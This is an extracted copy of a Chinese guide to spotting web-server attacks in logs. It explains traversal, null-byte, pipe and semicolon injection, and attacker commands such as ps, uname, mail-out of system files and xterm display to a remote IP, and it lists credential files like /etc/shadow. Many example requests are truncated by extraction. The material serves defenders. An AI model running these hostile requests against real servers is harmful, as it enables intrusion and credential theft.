《通过日志检测网站被攻击.》由会员分享,可在线阅读,更多相关《通过日志检测网站被攻击.(6页珍藏版)》请在金锄头文库上搜索。
1、web站点默认80 为服务端口,关于它的各种安全问题不断的发布出来,这些漏洞中一些 甚至允许攻击者获得系统管理员的权限进入站点内部,以下是 Zenomorph对一些 80 端口 攻击方式的痕迹的研究,和告诉你怎样从日志记录中发现问题。 详细描述 下面部分通过一些列子,展示对web 服务器和其上的应用程序普遍的攻击,和其留下的 痕迹, 这些列子仅仅是代表了主要的攻击方式,并没有列出所有的攻击形式,这部分将详细 描述每种攻击的作用,和其怎样利用这些漏洞进行攻击。 (1). . 和 . 请求 这些攻击痕迹是非常普遍的用于web 应用程序和web 服务器,它用于允许攻击者或者蠕 虫病毒程序改变web
2、服务器的路径, 获得访问非公开的区域。大多数的CGI 程序漏洞含有 这些 . 请求。 Example: 这个列子展示了攻击者请求mosd这个文件,如果攻击者有能力突破web 服务器根目录, 那么可以获得更多的信息,并进一步的获得特权。 (2)%20 请求 %20是表示空格的16 进制数值,虽然这个并不代表你能够利用什么,但是在你浏览日 志的时候会发现它,一些web 服务器上运行的应用程序中这个字符可能会被有效的执行, 所以,你应该仔细的查看日志。另一方面,这个请求有时可以帮助执行一些命令。 Example: 这个列子展示了攻击者执行了一个unix的命令,列出请求的整个目录的文件,导致攻击 者访
3、问你系统中重要的文件,帮助他进一步取得特权提供条件。 (3)%00 请求 %00表示 16 进制的空字节, 他能够用于愚弄web 应用程序, 并请求不同类型的文件。 Examples: 这可能是个有效的请求在这个机子上,如果攻击者注意到这个请求动作成功,他会进一步 寻找这个 cgi 程序的问题。 也许这个cgi程序不接受这个请求,原因在于它要检查这个请求文件的后缀名,如: html.shtml或者其他类型的文件。大多数的程序会告诉你所请求的文件类型无效,这个时 候它会告诉攻击者请求的文件必须是一某个字符后缀的文件类型,这样, 攻击者可以获得系 统的路径,文件名,导致在你的系统获得更多的敏感信息
4、 . /./etc/motd%00html 注意这个请求,它将骗取cgi 程序认为这个文件是个确定的可接受的文件类型,一些应用 程序由于愚蠢的检查有效的请求文件,这是攻击者常用的方法。 (4) 请求 这是个管道字符,在unix系统用于帮助在一个请求中同时执行多个系统命令。 Example: # cat access_log grep -i . (这个命令将显示日志中的“ . “请求,常用于发现攻击者和蠕虫攻击) 常可以看到有很多web 应用程序用这个字符,这也导致IDS 日志中错误的报警。 在你的程序仔细的检查中,这样是有好处的,可以降低错误的警报在入侵检测系统中。 下面给出一些列子: 这个请
5、求命令执行,下面是一些变化的列子 . bin/ls%20-al%20/etc 这个请求在unix系统中列出 /etc目录的所有文件 grep%20-i%20lame 这个请求cat 命令的执行并且grep命令也将执行,查询出” lame (5); 请求 在 unix 系统,这个字符允许多个命令在一行执行 Example: # id;uname -a (执行 id 命令后,紧跟着执行uname命令) 一些 web 程序用这个字符,可能导致在你的IDS 日志中失败的警告,你应该仔细的检查 你的 web 程序,让你的IDS 警报失败的几率降低。 (6) 请求 应该检查你的日志记录中这两个字符,众多的
6、原因中, 首要的一个是这个字符表明了添加 数据在文件中 Example 1: # echo your hax0red h0 h0 /etc/motd (请求写信息在motd这个文件中 ) 一个攻击者可以容易的用象上面的这个请求篡改你的web 页面。 比如著名的RDS exploit 常被攻击者用于更改web 主页面。 Example 2: 你会注意到这里html语言的标志,他同样用了“ ” , “ ” 字符,这种攻击不能导致攻击 者对系统进行访问,它迷惑人们认为这是个合法的信息在web 站点中(导致人们在访问这 个联结的时候访问到攻击者设定的地址,这种请求可能会被转变成16 进制的编码字符形式
7、, 使攻击的痕迹不那么明显) (7)! 请求 这种字符请求常用语对SS(Server Side Include) I进行攻击,如果攻击者迷惑用户点 击被攻击者设定的联结,和上面的一样。 Example: 2 1/something.php= 这个列子是攻击者可能会做的,它让一个2站点上的文件看起来是来 自于1上面的(当然,需要访问者访问这个被攻击者设定的联结。这 种请求可能被转化成16 进制的编码伪装,不易发现) 同时,这种方式也可以以web 站点的权限执行命令 Example: %200day.txt 0here%20%200day.txt; ps 命令 列出当前运行的进程,告诉攻击者远程主
8、机运行了那些软件,以便从中得到一些安全问题 的主意,获得进一步的权限 Examples: . ././bin/ps%20-aux kill and killall 命令 在 unix 系统这个命令用于杀掉进程,一个攻击者可以用这个命令来停止系统服务和程序, 同时可以擦掉攻击者的痕迹,一些exploit会产生很多的子进程 Examples: uname 命令 这个命令告诉攻击者远程机器的名字,一些时候,通过这个命令知道web站点位于哪个 isp ,也许是攻击者曾今访问过的。通常uname -a来请求,这些都将记录在日志文件中 Examples: . ././bin/uname%20-a cc,
9、gcc, perl, python, etc. 编译 /解释命令 攻击者通过wget或者 tftp下载 exploit,并用 cc,gcc这样的编译程序进行编译成可执 行程序,进一步获得特权 Examples: . in/cc%20Phantasmp.c 0-p%2031337 ; 如果你查看日志中发现有“ perl” python”这些说明可能攻击者下载远程的perl ,python 脚本程序,并试图本地获得特权 mail 命令 攻击者通常用这个命令将系统的一些重要文件发到攻击者自己的信箱,也肯能是进行邮件 炸弹的攻击 Examples: . l%20attackerfuckcn honke
10、r .org%20%20/etc/motd use.gov%20 /tmp/wu-2.6.1.c; xterm/其他 X 应用程序 命令 xterm 常用来获得远程机器上的shell, 如果你在你的日志中发现这些符号,可要认真分 析你的系统,可能已经存在安全裂口。注意在日志中查找%20-display%20 这个字符, 这种痕迹通常是在远程机子上启动xterm或者 X 应用程序 Examples: . play%20192.168.22.1 . play%20192.168.22.1; chown, chmod, chgrp, chsh, etc. 等命令 在 unix 系统这些命令允许改变文
11、件的许可权限 chown = 允许设置文件的拥有者chmod = 允许设置文件的许可权限chgrp =允许改 变组对文件的拥有权限chsh = 允许改变用户的shell Examples: . od%20777%20index.ht ml . %20777%20index.html; . wn%20zeno%20/etc/ma ster .passwd . rp%20nobody%20/etc/ shadow /etc/passwd 文件 这是系统的密码文件,一般是shadow过的,并且不允许看到加密的口令,不过对攻击 者来说,可以知道那些是有效的用户,以及系统的绝对路径,站点名称等信息,由于
12、通常被 shadow过的,所以对攻击者,通常会查看/etc/shadow 文件 /etc/master.passwd 这个文件是BSD 系统的密码文件,包含有加密过的密码,这个文件对root帐号仅仅是只 读的,而一些不熟练的攻击者会打开他试图读取里面的内容.,如果 web 站点是以root权 限运行的, 那么对攻击者来说,就能够读取里面的内容,对系统管理员很多问题也将接踵而 来 /etc/shadow 包含有加密过的系统口令,对root帐号同样只读,和/et/master.passwd差不多 /etc/motd 当用户登陆进unix系统中出现的信息,就在这个Message of the Day
13、 文件中,它提 供重要的系统信息和管理员对用户的一些设置,那些是希望用户看到的,那些不是, 还含有 系统的版本信息,攻击者通常查看此文件,了解是什么系统在运行,对攻击者来说,下一步 是搜索这种类型的系统的exploit,进一步获得系统特权 /etc/s 该文件提供ip 地址和网络信息,攻击者可以了解更多的系统中的网络设置 /usr/local/apache/conf/httpd.conf 这是个 Apache web服务器的配置文件, 攻击者可以了解诸如cgi,ssi是否可访问等信息 /etc/inetd.conf 这是inetd服务的配置文件,攻击者可以了解远程机器上的那些服务启动,是否用了
14、 wrapper进 行 访 问 控 制 , 如 果 发 现wrapper 运 行 着 , 攻 击 者 下 一 步 会 检 查 /etc/s.allow 和 /etc/s.deny,文件,并可能 会更改里面的一些设置,获得特权 .htpasswd, .htaccess, and .htgroup 这些文件通常在web 站点用于对用户身份进行认证,攻击者会查看这些文件,并获得用 户名和密码,密码文件.htpasswd被加密过,通过一些简单的破解程序进行解密,使攻击 者访问站点中被保护的区域(通常用户用和用户名相同的密码,以至攻击者可以以其他帐号 进行访问) access_log and error
15、_log 这些是 apache服务器的日志记录文件,攻击者常会查看这些文件,看那些请求被记录, 那些和其他请求不同的地方 通常,攻击者会修改这些日志文件,比如他自身的地址信息,攻击者通过80 端口突破你 的系统, 而你的系统又没有进行备份的工作,也没有其他记录程序记录系统状况,这将使入 侵检测工作变的很困难 drive-letter:winntrepairsam._ or drive-letter:winntrepairsam Windows NT 系统中的密码文件,如果远程命令不可以执行,通常攻击者会请求这些文 件 , 然 后 通 过 l0pht crack之 类 的 密 码 破 解 工具
16、进 行 破 解 , 如 果 攻 击 者 试 图 攻 击 administrator的密码文件,如果成功那么远程机器将被攻击者得到控制权 溢出分析 我不会在这篇文章中说过多的关于溢出的话题,我将举列说明那些现象和痕迹值得注意和 特别关注的地方,缓冲攻击常被攻击者通过编码转换和其他途径来达到不易发现 下面是个简单的列子 Example: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA
